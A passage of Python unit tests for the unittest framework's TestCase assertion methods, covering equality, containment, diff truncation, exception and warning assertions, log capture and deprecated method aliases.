# from this TestCase instance, but since it's a local, nothing else
# will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
def testAssertIn(self):
animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
self.assertIn('a', 'abc')
self.assertIn(2, [1, 2, 3])
self.assertIn('monkey', animals)
self.assertNotIn('d', 'abc')
self.assertNotIn(0, [1, 2, 3])
self.assertNotIn('otter', animals)
self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
self.assertRaises(self.failureException, self.assertIn, 'elephant',
animals)
self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
self.assertRaises(self.failureException, self.assertNotIn, 'cow',
animals)
def testAssertDictContainsSubset(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertDictContainsSubset({}, {})
self.assertDictContainsSubset({}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({1: "one"}, {})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 2}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
one = ''.join(chr(i) for i in range(255))
# this used to cause a UnicodeDecodeError constructing the failure msg
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'foo': one}, {'foo': '\uFFFD'})
def testAssertEqual(self):
equal_pairs = [
((), ()),
({}, {}),
([], []),
(set(), set()),
(frozenset(), frozenset())]
for a, b in equal_pairs:
# This mess of try excepts is to test the assertEqual behavior
# itself.
try:
self.assertEqual(a, b)
except self.failureException:
self.fail('assertEqual(%r, %r) failed' % (a, b))
try:
self.assertEqual(a, b, msg='foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
try:
self.assertEqual(a, b, 'foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with third parameter failed' %
(a, b))
unequal_pairs = [
((), []),
({}, set()),
(set([4,1]), frozenset([4,2])),
(frozenset([4,5]), set([2,3])),
(set([3,4]), set([5,4]))]
for a, b in unequal_pairs:
self.assertRaises(self.failureException, self.assertEqual, a, b)
self.assertRaises(self.failureException, self.assertEqual, a, b,
'foo')
self.assertRaises(self.failureException, self.assertEqual, a, b,
msg='foo')
def testEquality(self):
self.assertListEqual([], [])
self.assertTupleEqual((), ())
self.assertSequenceEqual([], ())
a = [0, 'a', []]
b = []
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, a, b)
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, tuple(a), tuple(b))
self.assertRaises(unittest.TestCase.failureException,
self.assertSequenceEqual, a, tuple(b))
b.extend(a)
self.assertListEqual(a, b)
self.assertTupleEqual(tuple(a), tuple(b))
self.assertSequenceEqual(a, tuple(b))
self.assertSequenceEqual(tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual,
a, tuple(b))
self.assertRaises(self.failureException, self.assertTupleEqual,
tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual, None, b)
self.assertRaises(self.failureException, self.assertTupleEqual, None,
tuple(b))
self.assertRaises(self.failureException, self.assertSequenceEqual,
None, tuple(b))
self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
self.assertRaises(self.failureException, self.assertSequenceEqual,
1, 1)
self.assertDictEqual({}, {})
c = { 'x': 1 }
d = {}
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d)
d.update(c)
self.assertDictEqual(c, d)
d['x'] = 0
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d, 'These are unequal')
self.assertRaises(self.failureException, self.assertDictEqual, None, d)
self.assertRaises(self.failureException, self.assertDictEqual, [], d)
self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
def testAssertSequenceEqualMaxDiff(self):
self.assertEqual(self.maxDiff, 80*8)
seq1 = 'a' + 'x' * 80**2
seq2 = 'b' + 'x' * 80**2
diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
pprint.pformat(seq2).splitlines()))
# the +1 is the leading \n added by assertSequenceEqual
omitted = unittest.case.DIFF_OMITTED % (len(diff) + 1,)
self.maxDiff = len(diff)//2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertLess(len(msg), len(diff))
self.assertIn(omitted, msg)
self.maxDiff = len(diff) * 2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
self.maxDiff = None
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
def testTruncateMessage(self):
self.maxDiff = 1
message = self._truncateMessage('foo', 'bar')
omitted = unittest.case.DIFF_OMITTED % len('bar')
self.assertEqual(message, 'foo' + omitted)
self.maxDiff = None
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
self.maxDiff = 4
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
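    # An illustrative, hedged sketch (underscore-prefixed so discovery skips
    # it): a small maxDiff makes assertEqual truncate the diff and append the
    # DIFF_OMITTED notice exercised above, while maxDiff = None disables
    # truncation entirely.
    def _example_maxDiff_truncation(self):
        case = unittest.TestCase('run')
        case.maxDiff = 10
        try:
            case.assertEqual('a' * 100 + 'x', 'a' * 100 + 'y')
        except case.failureException as e:
            assert 'Set self.maxDiff to None' in str(e)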
def testAssertDictEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertDictEqual({}, {1: 0})
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertDictEqual did not fail')
def testAssertMultiLineEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertMultiLineEqual('foo', 'bar')
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertMultiLineEqual did not fail')
def testAssertEqual_diffThreshold(self):
# check threshold value
self.assertEqual(self._diffThreshold, 2**16)
# disable maxDiff to get diff markers
self.maxDiff = None
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 2**5
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
# under the threshold: diff marker (^) in error message
s = 'x' * (2**4)
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s + 'a', s + 'b')
self.assertIn('^', str(cm.exception))
self.assertEqual(s + 'a', s + 'a')
# over the threshold: diff not used and marker (^) not in error message
s = 'x' * (2**6)
# if the path that uses difflib is taken, _truncateMessage will be
# called -- replace it with explodingTruncation to verify that this
# doesn't happen
def explodingTruncation(message, diff):
raise SystemError('this should not be raised')
old_truncate = self._truncateMessage
self._truncateMessage = explodingTruncation
self.addCleanup(lambda: setattr(self, '_truncateMessage', old_truncate))
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
self.assertNotIn('^', str(cm.exception))
self.assertEqual(str(cm.exception), '%r != %r' % (s1, s2))
self.assertEqual(s + 'a', s + 'a')
def testAssertEqual_shorten(self):
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 0
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
s = 'x' * 100
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[35 chars]' + 'x' * 61
self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
self.assertEqual(s + 'a', s + 'a')
p = 'y' * 50
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[85 chars]xxxxxxxxxxx'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))
p = 'y' * 100
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[91 chars]xxxxx'
d = 'y' * 40 + '[56 chars]yyyy'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
def testAssertCountEqual(self):
a = object()
self.assertCountEqual([1, 2, 3], [3, 2, 1])
self.assertCountEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
self.assertCountEqual([a, a, 2, 2, 3], (a, 2, 3, a, 2))
self.assertCountEqual([1, "2", "a", "a"], ["a", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 2] + [3] * 100, [1] * 100 + [2, 3])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, "2", "a", "a"], ["a", "2", True, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[10], [10, 11])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11], [10])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11, 10], [10, 11])
# Test that sequences of unhashable objects can be tested for sameness:
self.assertCountEqual([[1, 2], [3, 4], 0], [False, [3, 4], [1, 2]])
# Test that iterator of unhashable objects can be tested for sameness:
self.assertCountEqual(iter([1, 2, [], 3, 4]),
iter([1, 2, [], 3, 4]))
# hashable types, but not orderable
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, 'x', 1, 5j, 2j, frozenset()])
# comparing dicts
self.assertCountEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
# comparing heterogeneous non-hashable sequences
self.assertCountEqual([1, 'x', divmod, []], [divmod, [], 'x', 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, [], 'x', 1, 5j, 2j, set()])
self.assertRaises(self.failureException, self.assertCountEqual,
[[1]], [[2]])
# Same elements, but not same sequence length
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, 2], [2, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, "2", "a", "a"], ["2", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, {'b': 2}, None, True], [{'b': 2}, True, None])
# Same elements, which don't compare reliably, in a
# different order (see issue 10242)
a = [{2,4}, {1,2}]
b = a[::-1]
self.assertCountEqual(a, b)
# test utility functions supporting assertCountEqual()
diffs = set(unittest.util._count_diff_all_purpose('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
diffs = unittest.util._count_diff_all_purpose([[]], [])
self.assertEqual(diffs, [(1, 0, [])])
diffs = set(unittest.util._count_diff_hashable('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
def testAssertSetEqual(self):
set1 = set()
set2 = set()
self.assertSetEqual(set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
self.assertRaises(self.failureException, self.assertSetEqual, set1, [])
set1 = set(['a'])
set2 = set()
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = set(['a'])
self.assertSetEqual(set1, set2)
set1 = set(['a'])
set2 = set(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = frozenset(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a', 'b'])
set2 = frozenset(['a', 'b'])
self.assertSetEqual(set1, set2)
set1 = set()
set2 = "foo"
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)
# make sure any string formatting is tuple-safe
set1 = set([(0, 1), (2, 3)])
set2 = set([(4, 5)])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
def testInequality(self):
# Try ints
self.assertGreater(2, 1)
self.assertGreaterEqual(2, 1)
self.assertGreaterEqual(1, 1)
self.assertLess(1, 2)
self.assertLessEqual(1, 2)
self.assertLessEqual(1, 1)
self.assertRaises(self.failureException, self.assertGreater, 1, 2)
self.assertRaises(self.failureException, self.assertGreater, 1, 1)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
self.assertRaises(self.failureException, self.assertLess, 2, 1)
self.assertRaises(self.failureException, self.assertLess, 1, 1)
self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)
# Try Floats
self.assertGreater(1.1, 1.0)
self.assertGreaterEqual(1.1, 1.0)
self.assertGreaterEqual(1.0, 1.0)
self.assertLess(1.0, 1.1)
self.assertLessEqual(1.0, 1.1)
self.assertLessEqual(1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)
# Try Strings
self.assertGreater('bug', 'ant')
self.assertGreaterEqual('bug', 'ant')
self.assertGreaterEqual('ant', 'ant')
self.assertLess('ant', 'bug')
self.assertLessEqual('ant', 'bug')
self.assertLessEqual('ant', 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')
# Try bytes
self.assertGreater(b'bug', b'ant')
self.assertGreaterEqual(b'bug', b'ant')
self.assertGreaterEqual(b'ant', b'ant')
self.assertLess(b'ant', b'bug')
self.assertLessEqual(b'ant', b'bug')
self.assertLessEqual(b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'bug')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, b'ant',
b'bug')
self.assertRaises(self.failureException, self.assertLess, b'bug', b'ant')
self.assertRaises(self.failureException, self.assertLess, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertLessEqual, b'bug', b'ant')
def testAssertMultiLineEqual(self):
sample_text = """\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...]
"""
revised_sample_text = """\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...] You may provide your
own implementation that does not subclass from TestCase, of course.
"""
sample_text_error = """\
- http://www.python.org/doc/2.3/lib/module-unittest.html
? ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
? ^^^
test case
- A test case is the smallest unit of testing. [...]
+ A test case is the smallest unit of testing. [...] You may provide your
? +++++++++++++++++++++
+ own implementation that does not subclass from TestCase, of course.
"""
self.maxDiff = None
try:
self.assertMultiLineEqual(sample_text, revised_sample_text)
except self.failureException as e:
# need to remove the first line of the error message
error = str(e).split('\n', 1)[1]
# no fair testing ourselves with ourselves: assertEqual delegates to
# assertMultiLineEqual for strings, so we can't use it either. Just use assertTrue.
self.assertTrue(sample_text_error == error)
def testAssertEqualSingleLine(self):
sample_text = "laden swallows fly slowly"
revised_sample_text = "unladen swallows fly quickly"
sample_text_error = """\
- laden swallows fly slowly
? ^^^^
+ unladen swallows fly quickly
? ++ ^^^^^
"""
try:
self.assertEqual(sample_text, revised_sample_text)
except self.failureException as e:
error = str(e).split('\n', 1)[1]
self.assertTrue(sample_text_error == error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
def testAssertRaisesCallable(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaises(ExceptionMock, Stub)
# A tuple of exception classes is accepted
self.assertRaises((ValueError, ExceptionMock), Stub)
# *args and **kwargs also work
self.assertRaises(ValueError, int, '19', base=8)
# Failure when no exception is raised
with self.assertRaises(self.failureException):
self.assertRaises(ExceptionMock, lambda: 0)
# Failure when another exception is raised
with self.assertRaises(ExceptionMock):
self.assertRaises(ValueError, Stub)
def testAssertRaisesContext(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
with self.assertRaises(ExceptionMock):
Stub()
# A tuple of exception classes is accepted
with self.assertRaises((ValueError, ExceptionMock)) as cm:
Stub()
# The context manager exposes caught exception
self.assertIsInstance(cm.exception, ExceptionMock)
self.assertEqual(cm.exception.args[0], 'We expect')
# *args and **kwargs also work
with self.assertRaises(ValueError):
int('19', base=8)
# Failure when no exception is raised
with self.assertRaises(self.failureException):
with self.assertRaises(ExceptionMock):
pass
# Failure when another exception is raised
with self.assertRaises(ExceptionMock):
self.assertRaises(ValueError, Stub)
def testAssertRaisesRegex(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
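    # A hedged illustration (underscore-prefixed so discovery skips it):
    # assertRaisesRegex also works as a context manager and exposes the
    # caught exception, mirroring testAssertRaisesContext above.
    def _example_assertRaisesRegex_context(self):
        with self.assertRaisesRegex(ValueError, 'literal') as cm:
            int('xyz')
        assert 'literal' in str(cm.exception)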
def testAssertNotRaisesRegex(self):
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, re.compile('x'),
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, 'x',
lambda: None)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexMismatch(self):
def Stub():
raise Exception('Unexpected')
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, '^Expected$',
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception,
re.compile('^Expected$'), Stub)
def testAssertRaisesExcValue(self):
class ExceptionMock(Exception):
pass
def Stub(foo):
raise ExceptionMock(foo)
v = "particular value"
ctx = self.assertRaises(ExceptionMock)
with ctx:
Stub(v)
e = ctx.exception
self.assertIsInstance(e, ExceptionMock)
self.assertEqual(e.args[0], v)
def testAssertWarnsCallable(self):
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
# Success when the right warning is triggered, even several times
self.assertWarns(RuntimeWarning, _runtime_warn)
self.assertWarns(RuntimeWarning, _runtime_warn)
# A tuple of warning classes is accepted
self.assertWarns((DeprecationWarning, RuntimeWarning), _runtime_warn)
# *args and **kwargs also work
self.assertWarns(RuntimeWarning,
warnings.warn, "foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarns(RuntimeWarning, lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarns(DeprecationWarning, _runtime_warn)
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
self.assertWarns(DeprecationWarning, _runtime_warn)
def testAssertWarnsContext(self):
# Believe it or not, it is preferable to duplicate all the tests above,
# to make sure the __warningregistry__ machinery is circumvented correctly.
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarns(RuntimeWarning) as cm:
_runtime_warn()
# A tuple of warning classes is accepted
with self.assertWarns((DeprecationWarning, RuntimeWarning)) as cm:
_runtime_warn()
# The context manager exposes various useful attributes
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foo")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Same with several warnings
with self.assertWarns(RuntimeWarning):
_runtime_warn()
_runtime_warn()
with self.assertWarns(RuntimeWarning):
warnings.warn("foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarns(RuntimeWarning):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
def testAssertWarnsRegexCallable(self):
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "foox")
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarnsRegex(DeprecationWarning, "o+",
_runtime_warn, "foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
def testAssertWarnsRegexContext(self):
# Same as above, but with assertWarnsRegex as a context manager
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarnsRegex(RuntimeWarning, "o+") as cm:
_runtime_warn("foox")
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foox")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(DeprecationWarning, "o+"):
_runtime_warn("foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
@contextlib.contextmanager
def assertNoStderr(self):
with captured_stderr() as buf:
yield
self.assertEqual(buf.getvalue(), "")
def assertLogRecords(self, records, matches):
self.assertEqual(len(records), len(matches))
for rec, match in zip(records, matches):
self.assertIsInstance(rec, logging.LogRecord)
for k, v in match.items():
self.assertEqual(getattr(rec, k), v)
def testAssertLogsDefaults(self):
# defaults: root logger, level INFO
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
self.assertEqual(cm.output, ["INFO:foo:1"])
self.assertLogRecords(cm.records, [{'name': 'foo'}])
def testAssertLogsTwoMatchingMessages(self):
# Same, but with two matching log messages
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'quux'}])
def checkAssertLogsPerLevel(self, level):
# Check level filtering
with self.assertNoStderr():
with self.assertLogs(level=level) as cm:
log_foo.warning("1")
log_foobar.error("2")
log_quux.critical("3")
self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
def checkAssertLogsPerLogger(self, logger):
# Check per-logger filtering
with self.assertNoStderr():
with self.assertLogs(level='DEBUG') as outer_cm:
with self.assertLogs(logger, level='DEBUG') as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'foo.bar'}])
# The outer catchall caught the quux log
self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
def testAssertLogsFailureNoLogs(self):
# Failure due to no logs
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs():
pass
def testAssertLogsFailureLevelTooHigh(self):
# Failure due to level too high
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs(level='WARNING'):
log_foo.info("1")
def testAssertLogsFailureMismatchingLogger(self):
# Failure due to mismatching logger (and the logged message is
# passed through)
with self.assertLogs('quux', level='ERROR'):
with self.assertRaises(self.failureException):
with self.assertLogs('foo'):
log_quux.error("1")
def testDeprecatedMethodNames(self):
"""
Test that the deprecated methods raise a DeprecationWarning. See #9424.
"""
old = (
(self.failIfEqual, (3, 5)),
(self.assertNotEquals, (3, 5)),
(self.failUnlessEqual, (3, 3)),
(self.assertEquals, (3, 3)),
(self.failUnlessAlmostEqual, (2.0, 2.0)),
(self.assertAlmostEquals, (2.0, 2.0)),
(self.failIfAlmostEqual, (3.0, 5.0)),
(self.assertNotAlmostEquals, (3.0, 5.0)),
(self.failUnless, (True,)),
(self.assert_, (True,)),
(self.failUnlessRaises, (TypeError, lambda _: 3.14 + 'spam')),
(self.failIf, (False,)),
(self.assertDictContainsSubset, (dict(a=1, b=2), dict(a=1, b=2, c=3))),
(self.assertRaisesRegexp, (KeyError, 'foo', lambda: {}['foo'])),
(self.assertRegexpMatches, ('bar', 'bar')),
)
for meth, args in old:
with self.assertWarns(DeprecationWarning):
meth(*args)
# disabled for now. When the version in which the fail* methods will
# be removed is decided, re-enable this test and update the version check
def _testDeprecatedFailMethods(self):
"""Test that the deprecated fail* methods get removed in 3.x"""
if sys.version_info[:2] < (3, 3):
return
deprecated_names = [
'failIfEqual', 'failUnlessEqual', 'failUnlessAlmostEqual',
'failIfAlmostEqual', 'failUnless', 'failUnlessRaises', 'failIf',
'assertDictContainsSubset',
]
for deprecated_name in deprecated_names:
with self.assertRaises(AttributeError):
getattr(self, deprecated_name) # remove these in 3.x
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
